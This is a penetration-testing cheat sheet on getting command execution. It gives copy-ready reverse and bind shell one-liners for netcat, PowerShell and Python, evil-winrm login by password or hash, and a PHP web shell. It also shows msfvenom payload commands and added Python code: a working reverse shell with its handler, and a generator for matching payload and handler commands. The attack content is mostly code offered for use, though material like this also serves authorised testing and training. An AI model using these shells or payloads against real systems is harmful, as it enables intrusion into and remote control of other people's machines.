Shells and Command Execution

Different ways to generate and manage command execution on a box

Netcat

The most basic netcat commands are nc -lvnp [port] to open a listener and nc [ip] [port] to connect to a port. A process can be attached to either side via the -e option, which is what turns the connection into a shell: nc -lvnp [port] -e /bin/bash run on the target gives a bind shell (the attacker then connects with nc [target_ip] [port]), while nc [attacker_ip] [port] -e /bin/bash run on the target gives a reverse shell, caught on the attacker side with nc -lvnp [port].

The -e option is not available in every netcat build (the OpenBSD variant shipped on many Debian-based systems lacks it), so the same effect can be obtained with a named pipe: mkfifo /tmp/f; nc -lvnp <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f creates a bind shell listener, and mkfifo /tmp/f; nc <LOCAL-IP> <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f creates a reverse shell. The loop works because whatever netcat receives from the socket is piped into the shell's stdin, while the shell's stdout and stderr are written to the fifo, which netcat reads as its own stdin and sends back over the socket.

Powershell One-Liner

powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('IP',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Python one-liner

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
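The two ends of a reverse shell, as an added example that is not part of the original page: a small handler that plays the role of nc -lvnp (accept one connection, send commands, read the output), and a client that does what the Python one-liner above does, connecting out and wiring /bin/sh's stdin, stdout and stderr to the socket. Passing the socket to subprocess.Popen is equivalent to the three os.dup2() calls; no pty is allocated, so this is a "dumb" shell like the one nc -e gives. Both ends run on an ephemeral localhost port, and the commands in the demo are constructed inputs.

```python
"""Reverse shell exchange on localhost: handler side and target side.
Added example, not code from the original page."""
import socket
import subprocess
import threading


def reverse_shell(host, port):
    """Target side: connect back and hand the socket to /bin/sh as its three
    standard file descriptors. Popen with stdin=stdout=stderr=socket does the
    same job as os.dup2(s.fileno(), 0/1/2) in the one-liner."""
    s = socket.create_connection((host, port))
    proc = subprocess.Popen(["/bin/sh"], stdin=s, stdout=s, stderr=s)
    s.close()  # the child holds its own copies of the descriptor
    proc.wait()
    return proc.returncode


def catch_shell(listener, commands, timeout=10.0):
    """Attacker side: accept one connection, push each command followed by a
    newline, then read until the remote shell exits and the socket closes.
    nc -lvnp does the same with the keyboard and terminal in place of the list."""
    listener.settimeout(timeout)
    conn, _ = listener.accept()
    conn.settimeout(timeout)
    with conn:
        for cmd in commands:
            conn.sendall(cmd.encode() + b"\n")
        conn.sendall(b"exit\n")  # end the session so recv() sees EOF
        out = b""
        while True:
            chunk = conn.recv(4096)
            if not chunk:
                break
            out += chunk
    return out.decode(errors="replace")


def demo(commands):
    """Run both ends in one process on an ephemeral localhost port and return
    everything the remote shell sent back."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    t = threading.Thread(target=reverse_shell, args=("127.0.0.1", port))
    t.start()
    try:
        return catch_shell(listener, commands)
    finally:
        t.join()
        listener.close()


if __name__ == "__main__":
    # constructed commands; the second one prints "marker-42"
    print(demo(["id", "echo marker-$((6*7))"]))
```

Because stderr is also attached to the socket, error messages from the remote shell come back to the handler; the PHP web shell further down does not do this, which is why commands sent to it are usually suffixed with 2>&1.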

Evil-winrm

evil-winrm -u [username] -p [password] -i [target ip]
evil-winrm -u [username] -H [hash] -i [target ip]

WebShells

Web shells are scripts uploaded to the server side of a web application (through an unrestricted file upload, for example) that give limited command execution: the command is passed as a parameter of the requested URI and its output comes back in the HTTP response.

<?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>

Using the above example, we could query http://[target_ip]/uploads/shell.php?cmd=whoami. Anything more than a single word has to be URL-encoded (spaces, slashes, quotes, and especially & and #, which would otherwise end the parameter), and the output comes back wrapped in the <pre> tags the script prints. Only stdout is returned by shell_exec(), so append 2>&1 to the command when a tool seems to produce nothing.

Msfvenom

msfvenom is the Metasploit Framework's payload generator: it combines a payload with an optional encoder and an output format, producing raw shellcode, a standalone executable, or a script in the target language, which is then delivered through an exploit, a file upload, or any other means of getting code to run on the target. Its most basic syntax boils down to:

msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port>

Staged payloads

In Metasploit, a staged payload is delivered in two parts. The first part, the stager, is a small piece of code whose only job is to open the connection (connecting back, or listening) and receive the second part, the stage, which is the actual payload: the command shell code or the Meterpreter DLL. The stage is sent by the handler over the connection the stager opened, so it never has to be embedded in the exploit.

The advantage is size: a stager is a few hundred bytes, so it fits where an exploit leaves little room for the payload, and the bulk of the code is only ever transferred over the network rather than written into the target in advance.

The cost is a second round trip. A stager that reaches the target but cannot complete the exchange with the handler produces no shell at all, and the handler has to be configured with exactly the same payload name, since it is the handler that decides which stage to send. Stageless payloads avoid this dependency at the price of a larger file.

Stageless payloads

A stageless payload is the whole payload in one piece: it contains all the code needed to open the connection and provide the shell, and nothing further is downloaded from the handler.

Stageless payloads are larger (a stageless Meterpreter is hundreds of kilobytes against a stager's few hundred bytes), which matters little when dropping an executable to disk but makes them the more conspicuous artifact for anyone inspecting the file. In exchange they are simpler and more reliable: one connection, no second exchange with the handler, and nothing to go wrong if the stage cannot be delivered.

Syntax

The Metasploit Framework uses a standardized naming convention for payloads so that the name itself says what each payload is. It is made of up to three parts separated by slashes:

<Platform>/<Arch>/<Payload>

The <Arch> part is left out where it does not apply: for non-native payloads such as php or java, and for 32-bit Windows, which is the default (windows/meterpreter/reverse_tcp is x86, windows/x64/meterpreter/reverse_tcp is x64).

Here's what each part means:

  • <Platform>: This indicates the target operating system or platform, such as windows, linux, solaris, bsd, java, php, etc.

  • <Arch>: This indicates the target CPU architecture, such as x86, x64, ppc, sparc, arm, mips, etc.

  • <Payload>: the payload itself, made of the payload kind (shell for a plain command shell, meterpreter, vncinject, etc.) and the transport it uses to reach the attacker (reverse_tcp, reverse_http, reverse_https, bind_tcp, find_tag, etc.).

Within the payload part, a slash between the kind and the transport means staged and an underscore means stageless: windows/x64/shell/reverse_tcp is staged (a stager that fetches the shell stage), windows/x64/shell_reverse_tcp is stageless (the complete shell in one piece). The handler must be set to the exact same name as the one given to msfvenom, since a staged handler waits for a stager to request a stage while a stageless handler expects a working shell straight away.

Multihandler

exploit/multi/handler is the Metasploit module that catches incoming connections from payloads generated with msfvenom (or delivered any other way) and turns them into sessions, most commonly Meterpreter sessions. It is configured with the same payload name, LHOST and LPORT that were given to msfvenom; for a bind payload it takes RHOST (the target to connect to) and LPORT instead.
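The naming convention, the staged/stageless distinction and the handler configuration from the three sections above, as an added example that is not the page's or Metasploit's own code: a parser that splits a payload name into platform, architecture, kind and transport and classifies it as staged or stageless, plus generators for a msfvenom command and a multi/handler resource script that agree with each other. The architecture and transport tables are my own and non-exhaustive, the output format chosen per platform is an assumption for the demo, and all IP addresses and ports are constructed values.

```python
"""Parse Metasploit payload names and emit a matching msfvenom command and
multi/handler resource script. Added example, not code from the original page."""
from dataclasses import dataclass
from typing import Optional

# Non-exhaustive table of architecture tokens that can follow the platform.
ARCHES = {"x86", "x64", "aarch64", "armle", "armbe", "mipsle", "mipsbe",
          "ppc", "ppc64", "sparc", "arm", "mips"}
# Transports recognised at the end of a stageless name; bind_* ones listen.
TRANSPORTS = ("reverse_tcp", "reverse_http", "reverse_https", "bind_tcp")
# Output format per platform: an assumption made for this demo.
FORMATS = {"windows": "exe", "linux": "elf"}


@dataclass
class Payload:
    name: str
    platform: str
    arch: Optional[str]       # sub-platform (unix/windows) for cmd/ payloads
    kind: str                 # shell, meterpreter, ...
    transport: Optional[str]  # None for single payloads such as cmd/unix/reverse_bash
    staged: bool


def parse_payload(name):
    """<platform>/[<arch>/]<kind>/<transport> is staged;
    <platform>/[<arch>/]<kind>_<transport> is stageless;
    anything else with one trailing token is a single, self-contained payload."""
    parts = name.split("/")
    if len(parts) < 2:
        raise ValueError("expected at least platform/payload: " + name)
    platform, rest = parts[0], parts[1:]
    arch = None
    if rest[0] in ARCHES or (platform == "cmd" and rest[0] in {"unix", "windows"}):
        arch, rest = rest[0], rest[1:]
    if len(rest) == 2:  # kind/transport: stager plus stage
        return Payload(name, platform, arch, rest[0], rest[1], staged=True)
    if len(rest) == 1:  # one token: stageless kind_transport, or a single
        token = rest[0]
        for t in TRANSPORTS:
            if token.endswith("_" + t):
                return Payload(name, platform, arch, token[: -len(t) - 1], t, staged=False)
        return Payload(name, platform, arch, token, None, staged=False)
    raise ValueError("unrecognised payload name: " + name)


def is_bind(p):
    return p.transport is not None and p.transport.startswith("bind")


def msfvenom_command(p, lhost, lport, out):
    """Bind payloads listen on the target, so they take no LHOST."""
    opts = ["LPORT=%d" % lport]
    if p.transport and not is_bind(p):
        opts.insert(0, "LHOST=" + lhost)
    fmt = FORMATS.get(p.platform, "raw")
    return "msfvenom -p %s %s -f %s -o %s" % (p.name, " ".join(opts), fmt, out)


def handler_rc(p, lhost, lport, rhost=None):
    """Resource script for exploit/multi/handler (run with msfconsole -r file.rc).
    The PAYLOAD line must be the exact name given to msfvenom."""
    lines = ["use exploit/multi/handler", "set PAYLOAD " + p.name]
    if is_bind(p):
        if not rhost:
            raise ValueError("a bind payload handler needs RHOST (the target address)")
        lines.append("set RHOST " + rhost)
    else:
        lines.append("set LHOST " + lhost)
    lines.append("set LPORT %d" % lport)
    lines.append("exploit -j")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    for name in ("windows/x64/shell/reverse_tcp", "windows/x64/shell_reverse_tcp",
                 "windows/meterpreter/reverse_https", "linux/x64/shell_bind_tcp",
                 "cmd/unix/reverse_bash"):
        p = parse_payload(name)
        print(p)
        print(msfvenom_command(p, "10.10.14.5", 4444, "payload.bin"))  # constructed values
        print(handler_rc(p, "10.10.14.5", 4444, rhost="10.10.10.20"))
```

Keeping the payload name in one place and deriving both commands from it removes the usual mistake of generating a stageless binary and waiting for it with a staged handler, or the reverse.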
